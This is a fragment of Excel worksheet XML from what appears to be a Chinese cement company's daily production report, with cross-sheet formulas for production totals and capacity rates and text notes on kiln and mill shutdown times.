      <c r="S54" s="247">
        <f>'[15]14'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]14'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'13'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]14'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'13'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]14'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]14'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'13'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]14'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'13'!K55</f>
        <v>4146.853</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>39582.503</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]14'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]14'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]14'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]14'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]14'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]14'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]14'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]14'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]14'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'13'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'13'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]14'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:20避峰停机；3#磨：0:00-22:20大修续停；4#磨：10:00-22:20避峰停机。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G57+'13'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'13'!K57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G58+'13'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'13'!K58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G59+'13'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'13'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]14'!$Q$65</f>
        <v>窑:正常。A组磨：9:15-24:00避峰停机。D1#磨：正常，D2#磨：正常。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G60+'13'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'13'!K60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'[14]14'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]14'!$E$6</f>
        <v>3299</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'13'!H61</f>
        <v>50888</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1166761</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]14'!$E$21</f>
        <v>4298.56</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'13'!K61</f>
        <v>55023.98</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1156184.06</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]14'!$H$6</f>
        <v>33633.1899999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>64.6792115384613</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'[14]14'!$M$11+'[14]14'!$M$12+'[14]14'!$M$13+'[14]14'!$M$14+'[14]14'!$M$15+'[14]14'!$M$16+'[14]14'!$M$17+'[14]14'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]14'!$N$11+'[14]14'!$N$12+'[14]14'!$N$13+'[14]14'!$N$14+'[14]14'!$N$15+'[14]14'!$N$16+'[14]14'!$N$17+'[14]14'!$N$18</f>
        <v>4489</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'13'!H62</f>
        <v>36716</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>872709.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]14'!$Q$11+'[14]14'!$Q$12+'[14]14'!$Q$13+'[14]14'!$Q$14+'[14]14'!$Q$15+'[14]14'!$Q$16+'[14]14'!$Q$17+'[14]14'!$Q$18</f>
        <v>2375</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'13'!K62</f>
        <v>36640</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>871112.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]14'!$T$11+'[14]14'!$T$12+'[14]14'!$T$13+'[14]14'!$T$14+'[14]14'!$T$15+'[14]14'!$T$16+'[14]14'!$T$17+'[14]14'!$T$18</f>
        <v>18530.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>74.1225359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]14'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]14'!$M$19+'[14]14'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]14'!$N$19+'[14]14'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'13'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]14'!$Q$19+'[14]14'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'13'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]14'!$T$19+'[14]14'!$T$20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G64+'13'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'13'!K64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G65+'13'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'13'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]14'!$Q$74</f>
        <v>1#窑:续停；2#窑:21:00点火升温；1#磨:9:45-22:20避峰停机。2#磨:8:00-22:10避峰停机。3#磨:8:00-22:55避峰停机。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G66+'13'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'13'!K66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G67+'13'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'13'!K67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'[15]14'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]14'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'13'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]14'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'13'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]14'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]14'!$Q$77</f>
        <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]14'!$D$43+'[15]14'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]14'!$E$43+'[15]14'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'13'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]14'!$H$43+'[15]14'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'13'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]14'!$K$43+'[15]14'!$K$44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'[15]14'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]14'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'13'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]14'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'13'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]14'!$K$45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G71+'13'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'13'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]14'!$Q$80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G72+'13'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'13'!K72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G73+'13'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'13'!K73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G74+'13'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'13'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]14'!$Q$83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G75+'13'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'13'!K75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G76+'13'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'13'!K76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G77+'13'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'13'!K77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G78+'13'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'13'!K78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'[16]14'!$E$7</f>
        <v>401.28</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'13'!H79</f>
        <v>7366.12</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>154494.59</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]14'!$I$7</f>
        <v>391</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'13'!K79</f>
        <v>7082.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>148973.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]14'!$L$7</f>
        <v>5168.4</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.3368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'[16]14'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'13'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]14'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'13'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]14'!$Y$15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G81+'13'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'13'!K81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G82+'13'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'13'!K82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G83+'13'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'13'!K83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G84+'13'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'13'!K84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G85+'13'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'13'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E30"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15/30</f>
        <v>0.5</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46006</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22879.16</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'14'!H5</f>
        <v>319377.09</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6474243.12</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23008.455</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'14'!K5</f>
        <v>341799.445</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6491870.576</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>245045.469</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>65.5201788770053</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]15'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]15'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]15'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]15'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]15'!$U$101</f>
        <v>64.1575</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]15'!$V$101</f>
        <v>64.6404727793696</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]15'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]15'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]15'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]15'!$D$23+'[11]15'!$D$17+'[12]15'!$D$17+'[13]15'!$D$25+'[14]15'!$D$8+'[14]15'!$D$15+'[15]15'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]15'!$E$23+'[11]15'!$E$17+'[12]15'!$E$17+'[13]15'!$E$25+'[14]15'!$E$8+'[14]15'!$E$15+'[15]15'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'14'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]15'!$I$23+'[11]15'!$I$17+'[12]15'!$I$17+'[13]15'!$I$25+'[14]15'!$E$23+'[14]15'!$E$30+'[15]15'!$H$7</f>
        <v>785.7</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'14'!K6</f>
        <v>10705.47</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>272903.17</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]15'!$L$23+'[11]15'!$L$17+'[12]15'!$L$17+'[13]15'!$L$25+'[14]15'!$H$23+'[14]15'!$H$30+'[15]15'!$K$7</f>
        <v>26835.37</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]15'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]15'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]15'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]15'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]15'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]15'!$V$102</f>
        <v>33.9684694364852</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]15'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]15'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]15'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]15'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]15'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'14'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]15'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'14'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]15'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]15'!$W$107</f>
        <v>118.270079435128</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]15'!$X$107</f>
        <v>125.813912115282</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]15'!$Y$107</f>
        <v>131.542617725297</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]15'!$T$107</f>
        <v>47.2083333333333</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]15'!$U$107</f>
        <v>46.8416666666667</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]15'!$V$107</f>
        <v>31.6864851957975</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]15'!$Q$107</f>
        <v>11.33</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]15'!$R$107</f>
        <v>168.63</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]15'!$S$107</f>
        <v>2654.06</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]15'!$D$27+'[11]15'!$D$18+'[13]15'!$D$26+'[14]15'!$D$10+'[14]15'!$D$17+'[15]15'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]15'!$E$27+'[11]15'!$E$18+'[13]15'!$E$26+'[14]15'!$E$10+'[14]15'!$E$17+'[15]15'!$E$9</f>
        <v>3106</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'14'!H8</f>
        <v>34334</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>559870.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]15'!$I$27+'[11]15'!$I$18+'[13]15'!$I$26+'[14]15'!$E$25+'[14]15'!$E$32+'[15]15'!$H$9</f>
        <v>2451.4</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'14'!K8</f>
        <v>37793.71</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>545538.42</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]15'!$L$27+'[11]15'!$L$18+'[13]15'!$L$26+'[14]15'!$H$25+'[14]15'!$H$32+'[15]15'!$K$9</f>
        <v>38420.19</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]15'!$W$108</f>
        <v>135.646958011997</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]15'!$X$108</f>
        <v>132.406006285648</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]15'!$Y$108</f>
        <v>127.78563497659</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]15'!$T$108</f>
        <v>48.625</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]15'!$U$108</f>
        <v>47.7277777777778</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]15'!$V$108</f>
        <v>28.2792502387774</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]15'!$Q$108</f>
        <v>11.67</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]15'!$R$108</f>
        <v>171.82</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]15'!$S$108</f>
        <v>2368.67</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]15'!$D$24+'[11]15'!$D$19+'[12]15'!$D$20+'[13]15'!$D$27+'[14]15'!$D$11+'[14]15'!$D$18+'[15]15'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]15'!$E$24+'[11]15'!$E$19+'[12]15'!$E$20+'[13]15'!$E$27+'[14]15'!$E$11+'[14]15'!$E$18+'[15]15'!$E$10</f>
        <v>15610</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'14'!H9</f>
        <v>232328</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4367716.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]15'!$I$24+'[11]15'!$I$19+'[12]15'!$I$20+'[13]15'!$I$27+'[14]15'!$E$26+'[14]15'!$E$33+'[15]15'!$H$10</f>
        <v>15282.865</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'14'!K9</f>
        <v>229965.095</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4327443.906</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]15'!$L$24+'[11]15'!$L$19+'[12]15'!$L$20+'[13]15'!$L$27+'[14]15'!$H$26+'[14]15'!$H$33+'[15]15'!$K$10</f>
        <v>113228.617</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]15'!$W$109</f>
        <v>296.915167095116</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]15'!$X$109</f>
        <v>275.684729064039</v>
